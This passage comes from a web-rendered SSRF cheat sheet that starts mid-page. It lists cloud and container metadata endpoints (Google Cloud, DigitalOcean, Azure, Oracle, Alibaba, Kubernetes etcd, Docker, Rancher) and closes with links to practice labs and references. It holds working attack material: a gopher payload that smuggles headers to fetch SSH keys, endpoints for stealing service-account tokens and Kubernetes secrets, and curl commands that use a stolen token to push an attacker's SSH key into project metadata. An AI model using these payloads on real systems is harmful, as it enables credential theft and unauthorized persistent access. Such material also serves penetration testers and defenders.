<div class="highlight"><pre><span></span><code><a id="__codelineno-53-1" name="__codelineno-53-1" href="#__codelineno-53-1"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1beta1</span><span class="p">/</span>
<a id="__codelineno-53-2" name="__codelineno-53-2" href="#__codelineno-53-2"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1beta1</span><span class="p">/</span><span class="k">?</span><span class="n">recursive</span><span class="p">=</span><span class="n">true</span>
</code></pre></div>
<p>Required headers can be set using a gopher SSRF with the following technique</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-54-1" name="__codelineno-54-1" href="#__codelineno-54-1"></a><span class="n">gopher</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">:</span><span class="n">80</span><span class="p">/</span><span class="n">xGET</span><span class="k">%</span><span class="n">20</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">attributes</span><span class="p">/</span><span class="n">ssh-keys</span><span class="k">%</span><span class="n">20HTTP</span><span class="k">%</span><span class="n">2f</span><span class="k">%</span><span class="n">31</span><span class="k">%</span><span class="n">2e</span><span class="k">%</span><span class="n">31</span><span class="k">%</span><span class="n">0AHost</span><span class="p">:</span><span class="k">%</span><span class="n">20metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="k">%</span><span class="n">0AAccept</span><span class="p">:</span><span class="k">%</span><span class="n">20</span><span class="k">%</span><span class="n">2a</span><span class="k">%</span><span class="n">2f</span><span class="k">%</span><span class="n">2a</span><span class="k">%</span><span class="n">0aMetadata-Flavor</span><span class="p">:</span><span class="k">%</span><span class="n">20Google</span><span class="k">%</span><span class="n">0d</span><span class="k">%</span><span class="n">0a</span>
</code></pre></div>
<p>Interesting files to pull out:</p>
<ul>
<li>SSH Public Key : <code>http://metadata.google.internal/computeMetadata/v1beta1/project/attributes/ssh-keys?alt=json</code></li>
<li>Get Access Token : <code>http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token</code></li>
<li>Kubernetes Key : <code>http://metadata.google.internal/computeMetadata/v1beta1/instance/attributes/kube-env?alt=json</code></li>
</ul>
<h4 id="add-an-ssh-key">Add an SSH key</h4>
<p>Extract the token</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-55-1" name="__codelineno-55-1" href="#__codelineno-55-1"></a><span class="n">http</span><span class="p">://</span><span class="n">metadata</span><span class="p">.</span><span class="n">google</span><span class="p">.</span><span class="n">internal</span><span class="p">/</span><span class="n">computeMetadata</span><span class="p">/</span><span class="n">v1beta1</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">service-accounts</span><span class="p">/</span><span class="k">default</span><span class="p">/</span><span class="n">token</span><span class="k">?</span><span class="n">alt</span><span class="p">=</span><span class="n">json</span>
</code></pre></div>
<p>Check the scope of the token</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-56-1" name="__codelineno-56-1" href="#__codelineno-56-1"></a><span class="p">$</span> <span class="nb">curl </span><span class="n">https</span><span class="p">://</span><span class="n">www</span><span class="p">.</span><span class="n">googleapis</span><span class="p">.</span><span class="n">com</span><span class="p">/</span><span class="n">oauth2</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">tokeninfo</span><span class="k">?</span><span class="n">access_token</span><span class="p">=</span><span class="n">ya29</span><span class="p">.</span><span class="n">XXXXXKuXXXXXXXkGT0rJSA</span>
<a id="__codelineno-56-2" name="__codelineno-56-2" href="#__codelineno-56-2"></a>
<a id="__codelineno-56-3" name="__codelineno-56-3" href="#__codelineno-56-3"></a><span class="p">{</span>
<a id="__codelineno-56-4" name="__codelineno-56-4" href="#__codelineno-56-4"></a> <span class="s2">&quot;issued_to&quot;</span><span class="p">:</span> <span class="s2">&quot;101302079XXXXX&quot;</span><span class="p">,</span>
<a id="__codelineno-56-5" name="__codelineno-56-5" href="#__codelineno-56-5"></a> <span class="s2">&quot;audience&quot;</span><span class="p">:</span> <span class="s2">&quot;10130207XXXXX&quot;</span><span class="p">,</span>
<a id="__codelineno-56-6" name="__codelineno-56-6" href="#__codelineno-56-6"></a> <span class="s2">&quot;scope&quot;</span><span class="p">:</span> <span class="s2">&quot;https://www.googleapis.com/auth/compute https://www.googleapis.com/auth/logging.write https://www.googleapis.com/auth/devstorage.read_write https://www.googleapis.com/auth/monitoring&quot;</span><span class="p">,</span>
<a id="__codelineno-56-7" name="__codelineno-56-7" href="#__codelineno-56-7"></a> <span class="s2">&quot;expires_in&quot;</span><span class="p">:</span> <span class="n">2443</span><span class="p">,</span>
<a id="__codelineno-56-8" name="__codelineno-56-8" href="#__codelineno-56-8"></a> <span class="s2">&quot;access_type&quot;</span><span class="p">:</span> <span class="s2">&quot;offline&quot;</span>
<a id="__codelineno-56-9" name="__codelineno-56-9" href="#__codelineno-56-9"></a><span class="p">}</span>
</code></pre></div>
<p>Now push the SSH key.</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-57-1" name="__codelineno-57-1" href="#__codelineno-57-1"></a><span class="nb">curl </span><span class="n">-X</span> <span class="n">POST</span> <span class="s2">&quot;https://www.googleapis.com/compute/v1/projects/1042377752888/setCommonInstanceMetadata&quot;</span>
<a id="__codelineno-57-2" name="__codelineno-57-2" href="#__codelineno-57-2"></a><span class="n">-H</span> <span class="s2">&quot;Authorization: Bearer ya29.c.EmKeBq9XI09_1HK1XXXXXXXXT0rJSA&quot;</span>
<a id="__codelineno-57-3" name="__codelineno-57-3" href="#__codelineno-57-3"></a><span class="n">-H</span> <span class="s2">&quot;Content-Type: application/json&quot;</span>
<a id="__codelineno-57-4" name="__codelineno-57-4" href="#__codelineno-57-4"></a><span class="p">-</span><span class="n">-data</span> <span class="s1">&#39;{&quot;items&quot;: [{&quot;key&quot;: &quot;sshkeyname&quot;, &quot;value&quot;: &quot;sshkeyvalue&quot;}]}&#39;</span>
</code></pre></div>
<h3 id="ssrf-url-for-digital-ocean">SSRF URL for Digital Ocean</h3>
<p>Documentation available at <code>https://developers.digitalocean.com/documentation/metadata/</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-58-1" name="__codelineno-58-1" href="#__codelineno-58-1"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">id</span>
<a id="__codelineno-58-2" name="__codelineno-58-2" href="#__codelineno-58-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">.</span><span class="n">json</span>
<a id="__codelineno-58-3" name="__codelineno-58-3" href="#__codelineno-58-3"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span>
<a id="__codelineno-58-4" name="__codelineno-58-4" href="#__codelineno-58-4"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">id</span>
<a id="__codelineno-58-5" name="__codelineno-58-5" href="#__codelineno-58-5"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">user-data</span>
<a id="__codelineno-58-6" name="__codelineno-58-6" href="#__codelineno-58-6"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">hostname</span>
<a id="__codelineno-58-7" name="__codelineno-58-7" href="#__codelineno-58-7"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">region</span>
<a id="__codelineno-58-8" name="__codelineno-58-8" href="#__codelineno-58-8"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">interfaces</span><span class="p">/</span><span class="n">public</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">ipv6</span><span class="p">/</span><span class="n">address</span>
<a id="__codelineno-58-9" name="__codelineno-58-9" href="#__codelineno-58-9"></a>
<a id="__codelineno-58-10" name="__codelineno-58-10" href="#__codelineno-58-10"></a><span class="n">All</span> <span class="k">in</span> <span class="n">one</span> <span class="n">request</span><span class="p">:</span>
<a id="__codelineno-58-11" name="__codelineno-58-11" href="#__codelineno-58-11"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">.</span><span class="n">json</span> <span class="p">|</span> <span class="n">jq</span>
</code></pre></div>
<h3 id="ssrf-url-for-packetcloud">SSRF URL for Packetcloud</h3>
<p>Documentation available at <code>https://metadata.packet.net/userdata</code></p>
<h3 id="ssrf-url-for-azure">SSRF URL for Azure</h3>
<p>Limited, maybe more exists? <code>https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-59-1" name="__codelineno-59-1" href="#__codelineno-59-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">v1</span><span class="p">/</span><span class="n">maintenance</span>
</code></pre></div>
<p>Update Apr 2017, Azure has more support; requires the header "Metadata: true" <code>https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service</code></p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-60-1" name="__codelineno-60-1" href="#__codelineno-60-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">instance</span><span class="k">?</span><span class="n">api-version</span><span class="p">=</span><span class="n">2017</span><span class="p">-</span><span class="n">04</span><span class="p">-</span><span class="n">02</span>
<a id="__codelineno-60-2" name="__codelineno-60-2" href="#__codelineno-60-2"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">metadata</span><span class="p">/</span><span class="n">instance</span><span class="p">/</span><span class="n">network</span><span class="p">/</span><span class="n">interface</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">ipv4</span><span class="p">/</span><span class="n">ipAddress</span><span class="p">/</span><span class="n">0</span><span class="p">/</span><span class="n">publicIpAddress</span><span class="k">?</span><span class="n">api-version</span><span class="p">=</span><span class="n">2017</span><span class="p">-</span><span class="n">04</span><span class="p">-</span><span class="n">02</span><span class="p">&amp;</span><span class="n">format</span><span class="p">=</span><span class="n">text</span>
</code></pre></div>
<h3 id="ssrf-url-for-openstackrackspace">SSRF URL for OpenStack/RackSpace</h3>
<p>(header required? unknown)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-61-1" name="__codelineno-61-1" href="#__codelineno-61-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">openstack</span>
</code></pre></div>
<h3 id="ssrf-url-for-hp-helion">SSRF URL for HP Helion</h3>
<p>(header required? unknown)</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-62-1" name="__codelineno-62-1" href="#__codelineno-62-1"></a><span class="n">http</span><span class="p">://</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">.</span><span class="n">169</span><span class="p">.</span><span class="n">254</span><span class="p">/</span><span class="n">2009</span><span class="p">-</span><span class="n">04</span><span class="p">-</span><span class="n">04</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
</code></pre></div>
<h3 id="ssrf-url-for-oracle-cloud">SSRF URL for Oracle Cloud</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-63-1" name="__codelineno-63-1" href="#__codelineno-63-1"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span>
<a id="__codelineno-63-2" name="__codelineno-63-2" href="#__codelineno-63-2"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">user-data</span><span class="p">/</span>
<a id="__codelineno-63-3" name="__codelineno-63-3" href="#__codelineno-63-3"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
<a id="__codelineno-63-4" name="__codelineno-63-4" href="#__codelineno-63-4"></a><span class="n">http</span><span class="p">://</span><span class="n">192</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">192</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">attributes</span><span class="p">/</span>
</code></pre></div>
<h3 id="ssrf-url-for-alibaba">SSRF URL for Alibaba</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-64-1" name="__codelineno-64-1" href="#__codelineno-64-1"></a><span class="n">http</span><span class="p">://</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">200</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span>
<a id="__codelineno-64-2" name="__codelineno-64-2" href="#__codelineno-64-2"></a><span class="n">http</span><span class="p">://</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">200</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">instance-id</span>
<a id="__codelineno-64-3" name="__codelineno-64-3" href="#__codelineno-64-3"></a><span class="n">http</span><span class="p">://</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">100</span><span class="p">.</span><span class="n">200</span><span class="p">/</span><span class="n">latest</span><span class="p">/</span><span class="n">meta-data</span><span class="p">/</span><span class="n">image-id</span>
</code></pre></div>
<h3 id="ssrf-url-for-kubernetes-etcd">SSRF URL for Kubernetes ETCD</h3>
<p>Can contain API keys and internal ip and ports</p>
<div class="highlight"><pre><span></span><code><a id="__codelineno-65-1" name="__codelineno-65-1" href="#__codelineno-65-1"></a><span class="nb">curl </span><span class="n">-L</span> <span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">2379</span><span class="p">/</span><span class="n">version</span>
<a id="__codelineno-65-2" name="__codelineno-65-2" href="#__codelineno-65-2"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">2379</span><span class="p">/</span><span class="n">v2</span><span class="p">/</span><span class="n">keys</span><span class="p">/</span><span class="k">?</span><span class="n">recursive</span><span class="p">=</span><span class="n">true</span>
</code></pre></div>
<h3 id="ssrf-url-for-docker">SSRF URL for Docker</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-66-1" name="__codelineno-66-1" href="#__codelineno-66-1"></a><span class="n">http</span><span class="p">://</span><span class="n">127</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">0</span><span class="p">.</span><span class="n">1</span><span class="p">:</span><span class="n">2375</span><span class="p">/</span><span class="n">v1</span><span class="p">.</span><span class="n">24</span><span class="p">/</span><span class="n">containers</span><span class="p">/</span><span class="n">json</span>
<a id="__codelineno-66-2" name="__codelineno-66-2" href="#__codelineno-66-2"></a>
<a id="__codelineno-66-3" name="__codelineno-66-3" href="#__codelineno-66-3"></a><span class="n">Simple</span> <span class="n">example</span>
<a id="__codelineno-66-4" name="__codelineno-66-4" href="#__codelineno-66-4"></a><span class="n">docker</span> <span class="n">run</span> <span class="n">-ti</span> <span class="n">-v</span> <span class="p">/</span><span class="n">var</span><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">docker</span><span class="p">.</span><span class="n">sock</span><span class="p">:/</span><span class="n">var</span><span class="p">/</span><span class="n">run</span><span class="p">/</span><span class="n">docker</span><span class="p">.</span><span class="n">sock</span> <span class="n">bash</span>
<a id="__codelineno-66-5" name="__codelineno-66-5" href="#__codelineno-66-5"></a><span class="n">bash</span><span class="p">-</span><span class="n">4</span><span class="p">.</span><span class="n">4</span><span class="c"># curl --unix-socket /var/run/docker.sock http://foo/containers/json</span>
<a id="__codelineno-66-6" name="__codelineno-66-6" href="#__codelineno-66-6"></a><span class="n">bash</span><span class="p">-</span><span class="n">4</span><span class="p">.</span><span class="n">4</span><span class="c"># curl --unix-socket /var/run/docker.sock http://foo/images/json</span>
</code></pre></div>
<p>More info:</p>
<ul>
<li>Daemon socket option: https://docs.docker.com/engine/reference/commandline/dockerd/#daemon-socket-option</li>
<li>Docker Engine API: https://docs.docker.com/engine/api/latest/</li>
</ul>
<h3 id="ssrf-url-for-rancher">SSRF URL for Rancher</h3>
<div class="highlight"><pre><span></span><code><a id="__codelineno-67-1" name="__codelineno-67-1" href="#__codelineno-67-1"></a><span class="nb">curl </span><span class="n">http</span><span class="p">://</span><span class="n">rancher-metadata</span><span class="p">/&lt;</span><span class="n">version</span><span class="p">&gt;/&lt;</span><span class="n">path</span><span class="p">&gt;</span>
</code></pre></div>
<p>More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-service/</p>
<h2 id="labs">Labs</h2>
<ul>
<li><a href="https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost">Basic SSRF against the local server</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-backend-system">Basic SSRF against another back-end system</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-blacklist-filter">SSRF with blacklist-based input filter</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-with-whitelist-filter">SSRF with whitelist-based input filter</a></li>
<li><a href="https://portswigger.net/web-security/ssrf/lab-ssrf-filter-bypass-via-open-redirection">SSRF with filter bypass via open redirection vulnerability</a></li>
</ul>
<h2 id="references">References</h2>
<ul>
<li><a href="https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf">AppSecEU15-Server_side_browsing_considered_harmful.pdf</a></li>
<li><a href="https://hawkinsecurity.com/2017/12/13/extracting-aws-metadata-via-ssrf-in-google-acquisition/">Extracting AWS metadata via SSRF in Google Acquisition - tghawkins - 2017-12-13</a></li>
<li><a href="http://buer.haus/2016/04/18/esea-server-side-request-forgery-and-querying-aws-meta-data/">ESEA Server-Side Request Forgery and Querying AWS Meta Data</a> by Brett Buerhaus</li>
<li><a href="https://hackerone.com/reports/115857">SSRF and local file read in video to gif converter</a></li>
<li><a href="https://hackerone.com/reports/115748">SSRF in https://imgur.com/vidgif/url</a></li>
<li><a href="https://hackerone.com/reports/358119">SSRF in proxy.duckduckgo.com</a></li>
<li><a href="https://hackerone.com/reports/374737">Blind SSRF on errors.hackerone.net</a></li>
<li><a href="https://hackerone.com/reports/382612">SSRF on *shopifycloud.com</a></li>
<li><a href="https://www.hackerone.com/blog-How-To-Server-Side-Request-Forgery-SSRF">Hackerone - How To: Server-Side Request Forgery (SSRF)</a></li>
<li><a href="https://twitter.com/albinowax/status/890725759861403648">Awesome URL abuse for SSRF by @orange_8361 #BHUSA</a></li>
<li><a href="http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html">How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! Orange Tsai</a></li>
<li><a href="https://www.youtube.com/watch?v=D1S-G8rJrEk">#HITBGSEC 2017 SG Conf D1 - A New Era Of SSRF - Exploiting Url Parsers - Orange Tsai</a></li>
<li><a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/">SSRF Tips - xl7dev</a></li>
<li><a href="https://hackerone.com/reports/115748">SSRF in https://imgur.com/vidgif/url</a></li>
<li><a href="https://www.dailysecurity.fr/server-side-request-forgery/">Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat</a></li>
<li><a href="http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf">AppSecEU15 Server side browsing considered harmful - @Agarri</a></li>
<li><a href="https://twitter.com/EdOverflow">Enclosed alphanumerics - @EdOverflow</a></li>
<li><a href="http://www.sxcurity.pro/2017/12/17/hackertarget/">Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity</a></li>
<li><a href="https://medium.com/secjuice/php-ssrf-techniques-9d422cb28d51">PHP SSRF @secjuice</a></li>
<li><a href="https://medium.com/@D0rkerDevil/how-i-convert-ssrf-to-xss-in-a-ssrf-vulnerable-jira-e9f37ad5b158">How I convert SSRF to xss in a ssrf vulnerable Jira</a></li>
<li><a href="https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a">Piercing the Veil: Server Side Request Forgery to NIPRNet access</a></li>
<li><a href="https://www.youtube.com/watch?v=66ni2BTIjS8">Hacker101 SSRF</a></li>
<li><a href="https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/">SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例</a></li>
<li><a href="https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978">SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019</a></li>
<li><a href="https://www.silentrobots.com/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/">SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst</a></li>
<li><a href="https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/">X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang</a></li>
<li><a href="https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/">Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure</a></li>
<li><a href="https://portswigger.net/web-security/ssrf">PortSwigger - Web Security Academy Server-side request forgery (SSRF)</a></li>
<li><a href="https://github.com/allanlw/svg-cheatsheet">SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019</a></li>
<li><a href="https://www.shorebreaksecurity.com/blog/ssrfs-up-real-world-server-side-request-forgery-ssrf/">SSRFs up! Real World Server-Side Request Forgery (SSRF) - shorebreaksecurity - 2019</a></li>
<li><a href="https://www.kieranclaessens.be/cscbe-web-2018.html">challenge 1: COME OUT, COME OUT, WHEREVER YOU ARE!</a></li>
<li><a href="https://blog.pwnl0rd.me/post/lfi-netdoc-file-java/">Attacking Url's in JAVA</a></li>
<li><a href="https://twitter.com/thedawgyg/status/1224547692967342080">SSRF: Don't encode entire IP</a></li>
</ul>
<aside class="md-source-file">
<span class="md-source-file__fact">
<span class="md-icon" title="Last update">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M21 13.1c-.1 0-.3.1-.4.2l-1 1 2.1 2.1 1-1c.2-.2.2-.6 0-.8l-1.3-1.3c-.1-.1-.2-.2-.4-.2m-1.9 1.8-6.1 6V23h2.1l6.1-6.1-2.1-2M12.5 7v5.2l4 2.4-1 1L11 13V7h1.5M11 21.9c-5.1-.5-9-4.8-9-9.9C2 6.5 6.5 2 12 2c5.3 0 9.6 4.1 10 9.3-.3-.1-.6-.2-1-.2s-.7.1-1 .2C19.6 7.2 16.2 4 12 4c-4.4 0-8 3.6-8 8 0 4.1 3.1 7.5 7.1 7.9l-.1.2v1.8Z"/></svg>
</span>
<span class="git-revision-date-localized-plugin git-revision-date-localized-plugin-date">August 25, 2023</span>
</span>
</aside>
</article>
</div>
<script>var target=document.getElementById(location.hash.slice(1));target&&target.name&&(target.checked=target.name.startsWith("__tabbed_"))</script>
</div>
<button type="button" class="md-top md-icon" data-md-component="top" hidden>
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M13 20h-2V8l-5.5 5.5-1.42-1.42L12 4.16l7.92 7.92-1.42 1.42L13 8v12Z"/></svg>
Back to top
</button>
</main>
<footer class="md-footer">
<div class="md-footer-meta md-typeset">
<div class="md-footer-meta__inner md-grid">
<div class="md-copyright">
Made with
<a href="https://squidfunk.github.io/mkdocs-material/" target="_blank" rel="noopener">
Material for MkDocs
</a>
</div>
</div>
</div>
</footer>
</div>
<div class="md-dialog" data-md-component="dialog">
<div class="md-dialog__inner md-typeset"></div>
</div>
<script id="__config" type="application/json">{"base": "..", "features": ["content.code.copy", "navigation.tracking", "navigation.top"], "search": "../assets/javascripts/workers/search.b8dbb3d2.min.js", "translations": {"clipboard.copied": "Copied to clipboard", "clipboard.copy": "Copy to clipboard", "search.result.more.one": "1 more on this page", "search.result.more.other": "# more on this page", "search.result.none": "No matching documents", "search.result.one": "1 matching document", "search.result.other": "# matching documents", "search.result.placeholder": "Type to start searching", "search.result.term.missing": "Missing", "select.version": "Select version"}}</script>
<script src="../assets/javascripts/bundle.bd41221c.min.js"></script>
</body>
</html>
Reference in New Issue View Git Blame Copy Permalink